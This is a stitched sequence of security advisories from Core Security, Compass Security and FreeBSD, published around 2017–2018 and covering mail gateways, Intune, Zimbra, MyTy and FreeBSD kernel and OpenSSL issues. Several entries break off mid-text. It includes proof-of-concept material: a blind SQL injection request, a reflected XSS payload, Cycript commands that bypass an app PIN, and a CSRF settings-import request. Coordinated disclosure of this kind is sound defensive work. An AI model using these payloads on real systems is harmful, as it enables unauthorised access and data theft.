MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cISCQ//f9bjAzuou4wlbaoVBp+csfE8qwJl0PJAs/guwO9dO/TMLrVzJ+oNtAIR VO6T7j2uC/eLD80PFsGoTpDAm4O1gqcGGX4OZm/6rE/OdqC3/
[CORE-2017-0006] Trend Micro Email Encryption Gateway Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Trend Micro Email Encryption Gateway Multiple Vulnerabilities 1. *Advisory Information* Title: Trend Micro Email Encryption Gateway Multiple Vulnerabilities Advisory ID: CORE-2017-0006 Advisory URL: http://www.coresecurity.com/advisories/trend-micro-email-encryption-gateway-multiple-vulnerabilities Date published: 2018-02-21 Date of last update: 2018-02-21 Vendors contacted: Trend Micro Release mode: Coordinated release 2. *Vulnerability Information* Class: Cleartext Transmission of Sensitive Information [CWE-319], External Control of File Name or Path [CWE-73], Insufficient Verification of Data Authenticity [CWE-345], External Control of File Name or Path [CWE-73], Missing Authentication for Critical Function [CWE-306], Cross-Site Request Forgery [CWE-352], Improper Restriction of XML External Entity Reference [CWE-611], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-6219, CVE-2018-6220, CVE-2018-6221, CVE-2018-6222, CVE-2018-6223, CVE-2018-6224, CVE-2018-6225, CVE-2018-6226, CVE-2018-6226, CVE-2018-6227, CVE-2018-6228, CVE-2018-6229, CVE-2018-6230 3. *Vulnerability Description* Trend Micro's website states that:[1] Encryption for Email Gateway is a Linux-based software solution providing the ability to perform the encryption and decryption of email at the corporate gateway, regardless of the email client, and the platform from which it originated. The encryption and decryption of email on the TMEEG client is controlled by a Policy Manager that enables an administrator to configure policies based on various parameters, such as sender and recipient email addresses, keywords, or PCI compliance. Encryption for Email Gateway presents itself as an SMTP interface and delivers email out over an SMTP to configured outbound MTAs. This enables easy integration with other email server-based products, be them content scanners, mail servers, or archiving solutions." Multiple vulnerabilities were found in the Trend Micro Email Encryption Gateway web console that would allow a remote unauthenticated attacker to gain command execution as root. We also present two additional vectors to achieve code execution from a man-in-the-middle position. 4. *Vulnerable Packages* . Trend Micro Email Encryption Gateway 5.5 (Build .00) Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Trend Micro published the following Security Notes: . https://success.trendmicro.com/solution/1119349-security-bulletin-trend-micro-email-encryption-gateway-5-5-multiple-vulnerabilities 6. *Credits* These vulnerabilities were discovered and researched by Leandro Barragan and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Trend Micro Email Encryption Gateway includes a web console to perform administrative tasks. Section 7.4 describes a vulnerability in this console that can be exploited to gain command execution as root. The vulnerable functionality is accessible only to authenticated users, but it is possible to combine 7.4 with the vulnerability presented in section 7.5 to bypass this restriction and therefore execute root commands from the perspective of a remote unauthenticated attacker. The application does also use an insecure update mechanism that allows an attacker in a man-in-the-middle position to write arbitrary files and install arbitrary RPM packages, leading to remote command execution as the root user. Additional Web application vulnerabilities were found, including cross-site request forgery (7.6), XML external entity injection (7.7), several cross-site scripting vulnerabilities (7.8, 7.9, 7.10), and SQL injection vulnerabilities (7.11, 7.12, 7.13). 7.1. *Insecure update via HTTP* [CVE-2018-6219] Communication to the update servers is unencrypted. The following URL is fetched when the application checks for updates: /- [Request #1] http://downloads.privatepost.com/files/TMEEG/updates/data.html -/ The product expects to retrieve a plain-text file with the following format: /- [Version Info] [Installation RPM file name] [Path to release notes] -/ If a new update is found, then the RPM file is downloaded
CSNC-2017-027 Microsoft Intune - App PIN Bypass
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: Microsoft Intune [1] # Vendor: Microsoft # CSNC ID: CSNC-2017-027 # Subject: App PIN Bypass # Risk: Medium # Effect: Locally exploitable # Author: Stephan Sekula <stephan.sek...@compass-security.com> # Date: 31.08.2017 # # Introduction: - Define a mobile management strategy that fits the needs of your organization. Apply flexible mobile device and app management controls that let employees work with the devices and apps they choose while protecting your company information. [1] Compass Security discovered a design weakness in Microsoft Intune's app protection. This weakness allows a malicious user that gets hold of an employee's iOS device to access company data even without knowing the app PIN. Technical Description - Microsoft Intune supports protection policies such as requiring a PIN to access a managed app. In the current implementation however, the app PIN is used to show and hide an overlay screen, restricting access to the files using the UI only. Therefore, if the device is jailbroken, a simple Cycript script can be written to hide the overlay and use the UI to access all stored files. To bypass the PIN, one needs to find the app's process ID (PID): # ps aux | grep OneDrive mobile2086 1.2 4.9 1287904 100480 ?? Ss 11:06AM 0:05.59 /var/containers/Bundle/Application/AE292B95-58D2-4ECE-B7DF-767F0679706C/OneDrive.app/OneDrive Attach to the app's process using Cycript and list the current view's details: # cycript -p 2086 cy# UIApp.keyWindow.recursiveDescription().toString() ; layer = > | > || [CUT BY COMPASS] |||| > Now, the overlay window can be hidden: cy# [#0x105088e00 setHidden: YES] The above command will lead to the PIN request window to be hidden, hence, granting access to the files using the mobile app UI. Workaround / Fix: - The PIN protection mechanism should be revisited. One solution would be, to encrypt all documents using a key derived from the user's PIN, hence rendering a simple Cycript bypass code useless. Furthermore, the app should verify whether the user's device is jailbroken, and if a jailbreak is detected, all managed apps and their data should be wiped from the device. Timeline: - 2017-08-22: Discovery by Stephan Sekula 2017-09-17: Initial vendor notification 2017-09-18: Initial vendor response 2017-10-04: Asking vendor for an update 2017-10-04: Vendor replies that engineers are working on reproducing the issue 2017-11-01 Asking vendor for an update 2017-11-02 Vendor replies that the root cause is a vulnerability in iOS. Case is marked as won't fix. 2018-02-13 Public disclosure References: --- [1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune
[CORE-2017-0010] - Kaspersky Secure Mail Gateway Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Kaspersky Secure Mail Gateway Multiple Vulnerabilities 1. *Advisory Information* Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities Advisory ID: CORE-2017-0010 Advisory URL: http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities Date published: 2018-02-01 Date of last update: 2018-02-01 Vendors contacted: Kaspersky Lab Release mode: Coordinated release 2. *Vulnerability Information* Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of Special Elements in Output Used by a Downstream Component [CWE-74], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2, CVE-pending-assignment-3, CVE-pending-assignment-4 3. *Vulnerability Description* >From Kaspersky Labs website: Kaspersky Secure Mail Gateway [1] gives you a fully integrated email system; mail security solution - including anti-spam, anti-malware, anti-phishing and more - in a single virtual appliance. It's easy to install and manage - so you save time on day-to-day mail and mail security tasks, while we deliver award-winning security that helps you keep your business safe and boost user productivity. Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web Management Console. It is possible for a remote attacker to abuse these vulnerabilities and gain command execution as root. 4. *Vulnerable Packages* Kaspersky Secure Mail Gateway 1.1.0.379 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* Kaspersky Labs published the following advisory . https://support.kaspersky.com/vulnerability.aspx?el=12430#010218 6. *Credits* These vulnerabilities were discovered and researched by Leandro Barragan from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* Kaspersky Secure Mail Gateway is a virtual appliance designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to monitor the application status and manage its operation. This Management Console provides no cross-site request forgery protection site-wide, which could result in administrative account takeover as shown in 7.1. In addition, an attacker who manages to get access to the Web Console could gain command execution as root (7.2) by injecting arbitrary content into the appliance's Postfix configuration. It is also possible to elevate privileges from kluser to root (7.3) by abusing a setuid binary shipped with the appliance, which executes a script located on an attacker-controlled location with root privileges. Apart from this, a reflected cross-site scripting vulnerability (7.4) was found which affects the Management Console. 7.1. *Cross-site Request Forgery leading to Administrative account takeover* [CVE-pending-assignment-1] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The "Import Application Settings" feature is particularly interesting because it allows users to restore a backup file that overwrites the appliance's configuration. A settings backup file contains five zlib segments: /- $ binwalk KSMG_settings.kz DECIMAL HEXADECIMAL DESCRIPTION -- 160x10Zlib compressed data, default compression 390x27Zlib compressed data, default compression 2242 0x8C2 Zlib compressed data, default compression 2268 0x8DC Zlib compressed data, default compression 3072 0xC00 Zlib compressed data, default compression -/ The last segment is a compressed backup of /var/opt/kaspersky/klms/db /passwd, which contains a list of usernames, passwords, and profiles, for example: /- # cat /var/opt/kaspersky/klms/db/passwd Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin -/ An attacker can craft a backup file that contains its own passwd file, and then submit it by abusing the CSRF vulnerability. The appliance then overwrites the original passwd file giving the attacker access to Administrator account. The following proof-of-concept request restores only account information in order to avoid changing appliance's current configuration. Please note that the file contents were removed to make it more readable. /- POST /ksmg/cgi-bin/klwi?action=importSettings=CC3262C5 HTTP/1.1 Host: server User-Ag
CVE-2017-8802 Zimbra Collaboration Suite - Stored Cross-Site Scripting
# # COMPASS SECURITY ADVISORY https://www.compass-security.com # # CVE ID : CVE-2017-8802 # Product: Zimbra Collaboration Suite (ZCS) [1] # Vendor: Synacor Inc. [2] # Subject: Stored Cross-Site Scripting (XSS) Vulnerability # Risk:High # Effect: Exploitable by Anonymous Internet Adversaries # Triggered in the Context of an Authenticated Zimbra Email User # Authors: Damian Pfammatter (damian.pfammat...@compass-security.com) # Alessandro Zala (alessandro.z...@compass-security.com) # Date:January 10th 2018 # Introduction: - The Zimbra Collaboration Suite (ZCS) is a collaborative software suite that includes Email servers as well as Email clients. According to the product website, more than 500 million people are currently using the Email collaboration tool [1]. Security Analysts of Compass Security Schweiz AG [3] discovered a Stored Cross-Site Scripting (XSS) vulnerability in the Zimbra Email web client, potentially resulting in a number of different attack scenarios. Affected Versions: -- No confirmed information about all affected versions is available. Versions prior to 8.8 GA Release are likely affected. Technical Description: -- The Zimbra Email web client is affected by a Stored Cross-Site Scripting (XSS) vulnerability. Remote attackers can target the vulnerability by sending an Email with XSS payload (e.g. JavaScript) in its body. In case the recipient selects the email in the Zimbra client, and accesses the "Show Snippet" functionality using the "Q" shortcut, the XSS payload is executed in the context of the recipient's Zimbra client. For example through social engineering, attackers could bring their victims into pressing "Q" while reading the compromised email, triggering the payload. Beside others, the malicious payload could compromise the confidentility, integrity as well as availability of the victim's emails. Also it could be possible to change Zimbra settings of the corresponding victim. Hotfix: --- The corresponding patch has been released in version 8.8.0 Beta2 [4] (Bug #107925). The patch is part of public release 8.8 GA Release. Timeline: - 2017-05-04: Vulnerability discovered 2017-05-05: Initial vendor notification 2017-05-05: Vendor confirmed security issue 2017-05-05: MITRE reserved CVE-2017-8802 for the issue 2017-12-12: Vendor released security fix & guidance to its customers 2018-01-10: Public disclosure References: --- [1] https://www.zimbra.com/ [2] https://www.synacor.com/ [3] https://www.compass-security.com/research/advisories/ [4] https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
FreeBSD Security Advisory FreeBSD-SA-17:12.openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-17:12.opensslSecurity Advisory The FreeBSD Project Topic: OpenSSL multiple vulnerabilities Category: contrib Module: openssl Announced: 2017-12-09 Affects:All supported versions of FreeBSD. Corrected: 2017-12-07 18:04:48 UTC (stable/11, 11.1-STABLE) 2017-12-09 03:44:26 UTC (releng/11.1, 11.1-RELEASE-p6) 2017-12-09 03:41:31 UTC (stable/10, 10.4-STABLE) 2017-12-09 03:45:23 UTC (releng/10.4, 10.4-RELEASE-p5) 2017-12-09 03:45:23 UTC (releng/10.3, 10.3-RELEASE-p26) CVE Name: CVE-2017-3737, CVE-2017-3738 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols. It is also a full-strength general purpose cryptography library. II. Problem Description Invoking SSL_read()/SSL_write() while in an error state causes data to be passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. [CVE-2017-3737] There is an overflow bug in the x86_64 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). [CVE-2017-3738] This bug only affects FreeBSD 11.x. III. Impact Applications with incorrect error handling may inappropriately pass unencrypted data. [CVE-2017-3737] Mishandling of carry propagation will produce incorrect output, and make it easier for a remote attacker to obtain sensitive private-key information. No EC algorithms are affected and analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. [CVE-2017-3738] IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Restart all daemons that use the library, or reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Restart all daemons that use the library, or reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.x] # fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-10.patch # fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-10.patch.asc # gpg --verify openssl-10.patch.asc [FreeBSD 11.x] # fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-11.patch # fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-11.patch.asc # gpg --verify openssl-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r326
CSNC-2017-029 MyTy Blind SQL Injection
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: MyTy # Vendor: Finlane GmbH # CSNC ID: CSNC-2017-029 # CVE ID: - # Subject: Blind SQL injection # Risk: High # Effect: Remotely exploitable # Author: Nicolas Heiniger <nicolas.heini...@compass-security.com> # Date: 21.11.2017 # # Introduction: - MyTy[1] is a software framework that includes a crowdfunding module. It can be installed on a customer server and used to create whitelabel websites for crowdfunding platforms. Compass Security discovered a web application security flaw in the crowdfunding module login process that allows an unauthenticated attacker to execute arbitrary SQL query against the database. This allows to read and modify the whole database, within the privilege limitations of the database user executing the queries. Affected: - Vulnerable: * MyTy 5.0.4 to 5.1.6 Technical Description - During the login process, the user email and password are sent in a POST request. In this request, the login_email parameter is concatenated into an SQL query in a way that allows for SQL injection. This was first discovered as a time-based blind injection with the following request: === POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1 =simpleLogin=0 HTTP/1.1 Host: [CUT BY COMPASS] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: [CUT BY COMPASS] Content-Length: 154 Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D; lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1; _ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703; cf_cookie_policy_read=1; _gat=1 CSNC-HEN: Pentest1-Blue Connection: close login=1===%252Fprojekte%252Fsuchergebnisse.html%253F _type=inline=1=simpleLogin _email=test'%2b(select*from(select(sleep(20)))a)%2b'_password=1234 === Workaround / Fix: - Install an up to date version of the MyTy software. As a developer: Strictly use prepared statements in order to protect the application from SQL injection. Optional addition: Validate all user input and filter dangerous characters, which can cause a change of the context and have to be filtered, cut or escaped e.g. " ' -- () ; Timeline: - 2017-11-21: Coordinated public disclosure date 2017-09-06: Release of fix in versions 5.0.12 and 5.1.7 2017-09-06: Initial vendor response 2017-09-06: Initial vendor notification 2017-09-06: Discovery by Nicolas Heiniger References: --- [1] https://www.finlane.com/loesungen/whitelabel-pages/ [2] https://github.com/sqlmapproject/sqlmap
CSNC-2017-030 MyTy Reflected Cross-Site Scripting (XSS)
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: MyTy # Vendor: Finlane GmbH # CSNC ID: CSNC-2017-030 # CVE ID: - # Subject: Reflected Cross-Site Scripting (XSS) # Risk: High # Effect: Remotely exploitable # Author: Nicolas Heiniger <nicolas.heini...@compass-security.com> # Date: 21.11.2017 # # Introduction: - MyTy[1] is a software framework that includes a crowdfunding module. It can be installed on a customer server and used to create whitelabel websites for crowdfunding platforms. Compass Security discovered a web application security flaw in the login page of the administration web console that allows an unauthenticated attacker to execute JavaScript code in the browser of a legitimate user. This allows, for instance, to redirect the user to a phishing page and gather credentials. Affected: - Vulnerable: * MyTy 5.1.0 to 5.1.7 Technical Description - In the login page of the administration console, a tyLang parameter is passed together with the user and the password in the login request. This parameter is then included unencoded in the HTTP response. The login request for a proof of concept is as follows: === POST /tycon/index.php HTTP/1.1 Host: [CUT BY COMPASS] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: [CUT BY COMPASS] Cookie: tyFl=de_de; XSRF-TOKEN=ZNc%2FZRg4sCgXP0g3IZZ8QxsO7caLshyKp7u75yiyW5o%3D; lang=de; PHPSESSID=b4pcsacfvpv716e3l825cqbuo3; tyBl=en_us; cfce=1; _ga=GA1.2.75537659.1504612703; cf_cookie_policy_read=1; _gid=GA1.2.1498092563.1504761922 CSNC-HEN: Pentest1-Blue Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 97 view=default==de"alert(1) _user_id=0_user_hash==admin=123456 === The HTTP response shows that the payload is returned unencoded in the HTML page: === HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Sep 2017 06:52:05 GMT Content-Type: text/html; charset=utf-8 [CUT BY COMPASS] myty-Login | myty 5.1.7/2017-09-06 var myty = { version: '5.1.7', revision: 5001007, backend: { basepath: '/tycon', language: 'de"alert(1)', themepath: '/tycon/themes/spring' }, [CUT BY COMPASS] === Workaround / Fix: - Install an up to date version of the MyTy software. As a developer: This issue can be fixed by properly encoding dangerous characters in the output according to the encoding rules of the respective type of context (HTML body, argument, JS string, generated URLs). For normal HTML body content, the following HTML entities can be used: <-> >-> "-> '-> &-> Timeline: - 2017-11-21: Coordinated public disclosure date 2017-09-08: Release of fix in version 5.1.8 2017-09-08: Initial vendor response 2017-09-07: Initial vendor notification 2017-09-07: Discovery by Nicolas Heiniger References: --- [1] https://www.finlane.com/loesungen/whitelabel-pages/
FreeBSD Security Advisory FreeBSD-SA-17:10.kldstat [REVISED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-17:10.kldstatSecurity Advisory The FreeBSD Project Topic: Information leak in kldstat(2) Category: core Module: kernel Announced: 2017-11-15 Credits:Ilja van Sprundel TJ Corley Affects:All supported versions of FreeBSD. Corrected: 2017-11-15 22:34:15 UTC (stable/11, 11.1-STABLE) 2017-11-15 22:49:47 UTC (releng/11.1, 11.1-RELEASE-p4) 2017-11-15 22:50:20 UTC (releng/11.0, 11.0-RELEASE-p15) 2017-11-15 22:35:16 UTC (stable/10, 10.4-STABLE) 2017-11-15 22:50:47 UTC (releng/10.4, 10.4-RELEASE-p3) 2017-11-15 22:51:08 UTC (releng/10.3, 10.3-RELEASE-p24) CVE Name: CVE-2017-1088 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. 0. Revision history v1.0 2017-11-15 Initial release. v1.1 2017-11-20 Corrected credit. Ilja van Sprundel first reported the issue to the project, but wasn't cited. The FreeBSD Security Team apologizes to Ilja for this oversight. I. Background The kldstat(2) syscall provides information about loaded kld files. The syscall takes a userland argument of struct kld_file_stat which is then filled with data about the kld file requested. II. Problem Description The kernel does not properly clear the memory of the kld_file_stat structure before filling the data. Since the structure filled by the kernel is allocated on the kernel stack and copied to userspace, a leak of information from the kernel stack is possible. III. Impact Some bytes from the kernel stack can be observed in userspace. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch # fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch.asc # gpg --verify kldstat.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r325867 releng/10.3/ r325878 releng/10.4/ r325877 stable/11/r325866 releng/11.0/ r325876 releng/11.1/ r325875 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision=NN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1088> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:10.kldstat.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEEHPf/b631yp++G4yy7Wfs1l3PaucFAloToOxfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDFD RjdGRjZGQURGNUNBOUZCRTFCOENCMkVENjdFQ0Q2NURDRjZBRTcACgkQ7Wfs1l3P audl/RAAkPqcGvCMAHucBtZH2sySvM/1L1NTl0I61eJaDqgnjooo3hRq5J/dlNlt zo48o2W0EOnr8QWJhVg1oADY5qxBVm8RldpAH1Y7lU1Pk1gw6buTvmlat9Y0TaRm i3WCYe/yzC9X50x12dSu2QCeir+HDHr
FreeBSD Security Advisory FreeBSD-SA-17:10.kldstat
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-17:10.kldstatSecurity Advisory The FreeBSD Project Topic: Information leak in kldstat(2) Category: core Module: kernel Announced: 2017-11-15 Credits:TJ Corley Affects:All supported versions of FreeBSD. Corrected: 2017-11-15 22:34:15 UTC (stable/11, 11.1-STABLE) 2017-11-15 22:49:47 UTC (releng/11.1, 11.1-RELEASE-p4) 2017-11-15 22:50:20 UTC (releng/11.0, 11.0-RELEASE-p15) 2017-11-15 22:35:16 UTC (stable/10, 10.4-STABLE) 2017-11-15 22:50:47 UTC (releng/10.4, 10.4-RELEASE-p3) 2017-11-15 22:51:08 UTC (releng/10.3, 10.3-RELEASE-p24) CVE Name: CVE-2017-1088 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background The kldstat(2) syscall provides information about loaded kld files. The syscall takes a userland argument of struct kld_file_stat which is then filled with data about the kld file requested. II. Problem Description The kernel does not properly clear the memory of the kld_file_stat structure before filling the data. Since the structure filled by the kernel is allocated on the kernel stack and copied to userspace, a leak of information from the kernel stack is possible. III. Impact Some bytes from the kernel stack can be observed in userspace. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterward, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch # fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch.asc # gpg --verify kldstat.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/10/r325867 releng/10.3/ r325878 releng/10.4/ r325877 stable/11/r325866 releng/11.0/ r325876 releng/11.1/ r325875 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision=NN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1088> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:10.kldstat.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEEHPf/b631yp++G4yy7Wfs1l3PaucFAloMxhRfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDFD RjdGRjZGQURGNUNBOUZCRTFCOENCMkVENjdFQ0Q2NURDRjZBRTcACgkQ7Wfs1l3P audjZhAA29uguakBjkQtnAlWceN0BOQlkp03iYQh61dFpdH98f7RQcr5cq77XKrM pkONtdEVbZNF9g6sly6n9dq5ivAuC9K1KGPtylMcPzHLTzDtV1B13vk2iwwgqkZ7 GgB+m305kcL85knaASn3PBYwKTKzGOrhZFUZuTTI4VAnbbEmIwTHnJlVHvNwFDIj je1XxdDBr4jq7SdCZH8YW9LZAMDi9b+0hg72u20ZQ66uNeadxN4i9DuWtMeHJHb7 2aZRtHhdw4imryUpHM4FnCp5zp9V87Gyv4wy7IrkOKYtbl4nWqxqVakL7T9yVmY5 Q4cGqreYq8bF2aM3LyT26VmDfMOovovHJpCRHf9fvlIMj6ajS39FKWMkEeU23ykg EiTNk090h/G3REWiPnWjbxt8VGnFGyLe3K1VQqUvS+LlQ4lc45WCJnEHcpbvXT/E TNTQ/85nE4BklV1d
FreeBSD Security Advisory FreeBSD-SA-17:09.shm
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-17:09.shmSecurity Advisory The FreeBSD Project Topic: POSIX shm allows jails to access global namespace Category: core Module: shm Announced: 2017-11-15 Credits:Whitewinterwolf Affects:FreeBSD 10.x Corrected: 2017-11-13 23:21:17 UTC (stable/10, 10.4-STABLE) 2017-11-15 22:45:50 UTC (releng/10.4, 10.4-RELEASE-p3) 2017-11-15 22:45:13 UTC (releng/10.3, 10.3-RELEASE-p24) CVE Name: CVE-2017-1087 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background POSIX shared memory objects allow realtime inter-process communication by sharing a memory area through the use of a named path (see shm_open(2)). This is used by some multi-process applications to share data between running processes, such as a common cache or to implement a producer-consumer model where several worker processes handle requests pushed by a producer process. II. Problem Description Named paths are globally scoped, meaning a process located in one jail can read and modify the content of POSIX shared memory objects created by a process in another jail or the host system. III. Impact A malicious user that has access to a jailed system is able to abuse shared memory by injecting malicious content in the shared memory region. This memory region might be executed by applications trusting the shared memory, like Squid. This issue could lead to a Denial of Service or local privilege escalation. IV. Workaround No workaround is available, but systems without jails or jails not having local users are not vulnerable. V. Solution 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Reboot the system for the update to take effect. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Reboot the system for the update to take effect. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 10.4, FreeBSD 